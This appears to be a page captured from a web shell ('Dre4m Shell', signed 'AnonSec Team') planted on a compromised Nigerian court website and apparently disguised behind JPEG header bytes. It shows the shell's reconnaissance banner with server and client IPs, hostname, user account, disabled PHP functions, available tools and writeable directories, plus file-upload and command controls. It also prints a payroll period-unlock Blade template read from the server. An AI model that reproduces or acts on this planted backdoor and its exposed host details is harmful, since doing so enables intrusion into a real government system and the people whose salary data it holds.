ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 13.59.61.147
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/859676f59a79f25085caf92c6159e18e8f4a677d.php
<?php $__env->startSection('pageTitle'); ?>
Salary Computation
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
<div class="box box-default">
        <div class="box-header with-border hidden-print">
          <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?> <span id='processing'></span></h3>
        </div>
        <?php if($warning<>''): ?>
	<div class="alert alert-dismissible alert-danger">
	<button type="button" class="close" data-dismiss="alert">&times;</button>
	<strong><?php echo e($warning); ?></strong> 
	</div>
	<?php endif; ?>
	<?php if($success<>''): ?>
	<div class="alert alert-dismissible alert-success">
	<button type="button" class="close" data-dismiss="alert">&times;</button>
	<strong><?php echo e($success); ?></strong> 
	</div>
	<?php endif; ?>
	<?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>
        <?php if(session('message')): ?>
                        <div class="alert alert-success alert-dismissible" role="alert">
              <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong> <?php echo e(session('message')); ?></div>                        
                        <?php endif; ?>
                        
                        <?php if(session('error_message')): ?>
	        <div cla<div class="alert alert-danger alert-dismissible" role="alert">
	          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span> </button>
	          <strong>Error!</strong> <?php echo e(session('error_message')); ?></div>
	        <?php endif; ?>
	<form method="post"  id="thisform1" name="thisform1" enctype="multipart/form-data">
		<?php echo e(csrf_field()); ?>

		<div class="box-body">
<div class="row">
	<?php if($CourtInfo->courtstatus==1): ?>
      <div class="col-md-6">
              <div class="form-group">
                <label>Select Court</label>
                <select name="court" id="court" class="form-control" style="font-size: 13px;" onchange="ReloadForm();">
                  <option value="">Select Court</option>
                  <?php $__currentLoopData = $CourtList; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>                  
                  <option value="<?php echo e($b->id); ?>" <?php echo e(($court) == $b->id? "selected":""); ?>><?php echo e($b->court_name); ?></option>               
                  <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                </select>
                 
              </div>
            </div>
<?php else: ?>
<input type="hidden" id="court" name="court" value="<?php echo e($CourtInfo->courtid); ?>">
 <?php endif; ?>     
<?php if($CourtInfo->divisionstatus==1 && Auth::user()->is_global==1): ?>
      <div class="col-md-6">
              <div class="form-group">
                <label>Select Division</label>
               
                <select name="division" id="division" class="form-control" style="font-size: 13px;">
                 <option value="All">All Division</option>
                  <?php $__currentLoopData = $DivisionList; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>                  
                  <option value="<?php echo e($b->divisionID); ?>" <?php echo e(($division) == $b->divisionID? "selected":""); ?>><?php echo e($b->division); ?></option>             
                  <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                </select>
              </div>
            </div>
<?php else: ?>
<div class="col-md-6">
    <div class="form-group">
        <label>Division</label>
            <input type="text" class="form-control" id="divisionName" name="divisionName" value="<?php echo e($curDivision->division); ?>" readonly>
    </div>
</div>
  <input type="hidden" id="division" name="division" value="<?php echo e(Auth::user()->divisionID); ?>">
  <!--<input type="hidden" id="division" name="division" value="<?php echo e($CourtInfo->divisionid); ?>">-->
<?php endif; ?>
      </div>
       <div class="row">
        <div class="col-md-4">
          <div class="form-group">
            <label for="year">Year</label>
            <input type="Text" name="year" id="year" class="form-control" value="<?php echo e($PayrollActivePeriod->year); ?>" readonly>
          </div>
        </div>
        <div class="col-md-4">
            <div class="form-group">
              <label for="month">Month</label>
              <input type="Text" name="month" id="month" class="form-control" value="<?php echo e($PayrollActivePeriod->month); ?>" readonly>
            </div>
       </div>
       <div class="col-md-4">
            <div class="form-group">
              <div align="right">
                  <?php if($currentSalary == 0): ?>
              <input class="btn btn-success" name="unlock" type="submit" value="Unlock"/>
              <?php else: ?>
              <strong>Salary Review In Progress Unlocking is deactivated</strong>
              <?php endif; ?>
            </div>
            </div>
       </div>
      </div>

	</div>
	</form>
	
</div>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>
<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/activeMonth/periodunlock.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team